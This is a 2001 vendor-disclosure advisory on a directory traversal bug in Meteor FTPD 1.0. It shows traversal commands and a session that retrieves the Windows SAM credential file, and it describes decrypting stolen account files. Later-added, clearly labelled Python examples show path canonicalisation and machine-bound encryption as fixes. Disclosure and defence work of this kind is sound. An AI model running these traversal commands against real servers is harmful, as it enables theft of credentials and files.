From: brulez@cartel-info.fr
Date: Thu Sep 27 2001 - 17:58:08 CDT


    ------------------------------------------------------------------------------------------------
                       Cartel Informatique - Security Advisory

    Topic: Meteor FTPD 1.0 Directory Traversal
    Advisory ID: CARTSA-2001-03
    Public Disclosure: 2001-09-27
    Author Contacted: 2001-09-15
    Product: Meteor FTPD 1.0
    Credits: Nicolas Brulez - Brulez@cartel-info.fr
    ------------------------------------------------------------------------------------------------

    Vendor Affected:
    ================

    Charles Clark - meteorsoft@hotmail.com
    Freeware

    "Meteor FTP is a personal FTP server designed for the Microsoft Windows
    98 and Windows Millennium Edition operating systems."

    Note from the author:
    =====================

    "Be aware that any FTP server can present security vulnerabilities on the
    computer on which it runs, potentially allowing access to system
    resources beyond those intended by the system operator.
    For this reason Meteor FTP is NOT recommended for use on systems
    hosting sensitive files such as financial records, etc."

    True, and this server is vulnerable.

    Problem:
    ========

    The Cartel security team has found a directory traversal bug in the Meteor
    FTP server, allowing remote users to browse any directory on the victim's
    hard drive and to list or retrieve files outside the FTP root directory.
    This is possible by sending commands like:

    ls ../*
    ls /../*
    ls .../*

    cd ...

    Example:
    ========

    220 Service ready for new user
    Utilisateur (192.168.160.3:(none)) : nbz
    331 User name okay, need password
    Mot de passe :
    230- Meteor FTP Version 1.0
    230 User logged in, proceed
    ftp> ls ../winnt/repair/*
    200 Command OK
    150 About to open data connection
    .
    ..
    setup.log
    secsetup.inf
    system
    software
    default
    security
    sam
    ntuser.dat
    autoexec.nt
    config.nt
    226 Closing data connection. Requested file action successful.
    ftp : 110 octets reçus dans 0,02Secondes 5,50Ko/sec.
    ftp> get ../winnt/repair/sam sam2crack
    200 Command OK
    150 About to open data connection
    226 Closing data connection. Requested file action successful.
    ftp : 20480 octets reçus dans 0,01Secondes 2048,00Ko/sec.
    ftp> ls ../*
    ..

    We wouldn't be able to do it if we weren't logged in as administrator, though.
    That's why FTPD needs to be started with user privileges.

    ftp> cd ..
    501 Directory .. does not exist
    ftp> cd ...
    250 ... is current working directory
    ftp> ls
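The root cause shown above is that the server text-matches (or does not check at all) the `..` and `...` components a client sends instead of canonicalising the path and checking that the result still lies under the FTP root. The following is an added example of that containment check written for this advisory; it is not Meteor FTP's code and nothing on the page describes how the real server parses paths. It models the FTP root as the virtual path `/`, walks the requested path with a component stack so that a `..` with nothing left to pop is an escape, and rejects dot-only names such as the `...` that the session above shows being accepted as a directory. Treating backslashes as separators is an assumption based only on the server running on Windows.

```python
"""Added example: canonicalise a client-supplied FTP path and confine it
to the server root.  Not Meteor FTP's own code."""
import os


class PathEscapesRoot(ValueError):
    """Raised when a client-supplied path would resolve outside the FTP root."""


def resolve_ftp_path(cwd, requested):
    """Canonicalise `requested` against the virtual working directory `cwd`
    (already canonical; '/' is the FTP root) and return a virtual path that
    is guaranteed to stay under '/'.

    Components are walked with a stack rather than text-matched, so
    '../*', '/../*' and 'a/../../b' all fall under one rule: a '..' with
    nothing left to pop is an escape.  A component made only of dots
    ('...', '....') is rejected as well, since Windows treats such names
    specially and the advisory shows 'cd ...' being accepted.
    """
    # Assumption: the server runs on Windows, so backslashes separate too.
    requested = requested.replace("\\", "/")
    # Absolute requests start from the root, relative ones from cwd.
    stack = [] if requested.startswith("/") else [p for p in cwd.split("/") if p]
    for part in requested.split("/"):
        if part in ("", "."):
            continue
        if part == "..":
            if not stack:
                raise PathEscapesRoot(f"{requested!r} climbs above the FTP root")
            stack.pop()
            continue
        if set(part) == {"."}:
            raise PathEscapesRoot(f"{requested!r} uses dot-only name {part!r}")
        stack.append(part)
    return "/" + "/".join(stack)


def is_inside_root(cwd, requested):
    """True if the request resolves inside the root, False if it is rejected."""
    try:
        resolve_ftp_path(cwd, requested)
    except PathEscapesRoot:
        return False
    return True


def to_real_path(root_dir, virtual_path):
    """Map a canonical virtual path onto the directory the server exports.
    Only call this with the output of resolve_ftp_path; a wildcard such as
    '*' is left in place for the listing code to expand afterwards."""
    parts = [p for p in virtual_path.split("/") if p]
    return os.path.join(root_dir, *parts)


if __name__ == "__main__":
    # Constructed sample requests: the commands from the advisory plus a few
    # legitimate ones, checked from the root and from /pub.
    samples = [("/", "../*"), ("/", "/../*"), ("/", ".../*"), ("/", "..."),
               ("/", "../winnt/repair/sam"), ("/pub", "docs/../readme.txt"),
               ("/pub", "../incoming")]
    for cwd, req in samples:
        verdict = resolve_ftp_path(cwd, req) if is_inside_root(cwd, req) else "REJECTED"
        print(f"cwd={cwd:<5} request={req:<22} -> {verdict}")
```

The check runs on the virtual path before anything touches the filesystem, so the real root directory is only ever joined with components that survived the walk; listing code then expands `*` inside that directory rather than passing the raw client string to the OS.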

    Extra notes:
    ============

    The FTP server seems to behave differently on Win2K and Win9x:
    some commands work under one OS but not the other.
    The FTP server can be exploited on both OSes anyway :)
    The server asks for a password to encrypt the login/password file.
    This password can be found in the registry in plain text.
    With this attack, it is easy to imagine a way to get it from the
    registry and decrypt all the accounts (once the file has been leeched with
    the directory traversal bug).
    A computer-dependent password, based on the hard disk serial for
    example, would be more secure, and at least better than a plain-text one.
    I suggest hashing the HD serial and using it as the password, without
    storing it in the registry of course, else it is pointless: some algorithm
    at start-up without any use of the registry.
    Imagine an attacker getting the login file. He just has to install the
    server on his own computer, put the encrypted login file in place, enter
    the password he leeched from the compromised computer, and he has all
    the users/passwords.
    With the hash trick, his own box won't decrypt it properly, because of a
    different hash value, based on the HD serial.
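The design the notes propose, as an added example that is not Meteor FTP's code: the account-file key is derived at start-up from a machine-specific value and never written anywhere, and the file is authenticated before it is decrypted, so a copy opened on a machine with a different serial is refused rather than decrypted into garbage. The volume serial is passed in as a string here (on Windows it would be read with GetVolumeInformation); the label `APP_LABEL`, the serial values and the account lines are constructed for the demonstration. The SHA-256 counter-mode keystream is a stand-in for a real cipher so that the example runs on the standard library alone; a production build would use an AEAD such as AES-GCM with the same derived key.

```python
"""Added example: bind the encrypted account file to the machine's volume
serial instead of keeping a plain-text password in the registry.
Not Meteor FTP's own code."""
import hashlib
import hmac
import os

APP_LABEL = b"meteor-ftp-accounts-v1"  # constructed domain-separation label
NONCE_LEN = 16
TAG_LEN = 32


def derive_file_key(volume_serial):
    """Derive the account-file key from a machine-specific value at start-up.

    Nothing is written to the registry: the key exists only in memory, and a
    copy of the server on another machine derives a different key because
    its volume serial differs.  (Hypothetical input: on Windows the serial
    would come from GetVolumeInformation; here it is passed in as a string.)
    """
    return hashlib.sha256(APP_LABEL + volume_serial.encode("utf-8")).digest()


def _keystream(key, nonce, length):
    """SHA-256 in counter mode; a stand-in for a real cipher so the example
    needs only the standard library."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(out[:length])


def seal_accounts(key, plaintext):
    """Encrypt-then-MAC the account file: nonce || ciphertext || HMAC tag."""
    nonce = os.urandom(NONCE_LEN)
    stream = _keystream(key, nonce, len(plaintext))
    ciphertext = bytes(p ^ k for p, k in zip(plaintext, stream))
    tag = hmac.new(key, nonce + ciphertext, hashlib.sha256).digest()
    return nonce + ciphertext + tag


def open_accounts(key, blob):
    """Verify the tag before decrypting; a wrong key (another machine) or a
    modified file is refused instead of yielding garbage."""
    if len(blob) < NONCE_LEN + TAG_LEN:
        raise ValueError("account file is truncated")
    nonce, ciphertext, tag = blob[:NONCE_LEN], blob[NONCE_LEN:-TAG_LEN], blob[-TAG_LEN:]
    expected = hmac.new(key, nonce + ciphertext, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("account file was not sealed with this machine's key")
    stream = _keystream(key, nonce, len(ciphertext))
    return bytes(c ^ k for c, k in zip(ciphertext, stream))


def can_open(volume_serial, blob):
    """True if a server started on a machine with this serial can read the file."""
    try:
        open_accounts(derive_file_key(volume_serial), blob)
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    # Constructed serials and account data for the demonstration.
    victim_serial, attacker_serial = "1A2B-3C4D", "9F9F-0000"
    accounts = b"nbz:hunter2\r\nadmin:letmein\r\n"
    sealed = seal_accounts(derive_file_key(victim_serial), accounts)
    print("victim machine can read it  :", can_open(victim_serial, sealed))
    print("copied to attacker's machine:", can_open(attacker_serial, sealed))
```

The serial only binds the file to a machine; it is readable by anyone with local access, so this scheme removes the registry leak the notes describe but does not make the file safe against an attacker who already controls the host.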

    Status:
    =======

    The author has made a fix.

    Fix:
    ====

    Get the new version as soon as it is public.

    Greetings to my friends at:
    ===========================

    USSR, Hert, Vauban systems and qualys.

    About:
    ======

    Cartel is a company based in France, dedicated to research on network
    security and application security systems.

    Security services provided are:

    - Firewall testing
    - Network Penetration Testing
    - Application Security Testing
    - Data protection
    - Intrusion Detection systems
    - Binary auditing
    - Secure Web hosting
    - Antivirus
    - PKI
    - VPN

    Copyright (c) Cartel informatique Security Research LABS.

    This document is copyrighted. You can't modify it without explicit consent
    of CARTEL LABS. Feel free to publish it on any security site.

    For more information, feel free to contact us.

    Cartel info security research labs
    mail: srl@cartel-info.fr or Brulez@cartel-info.fr

    http://cartel-info.fr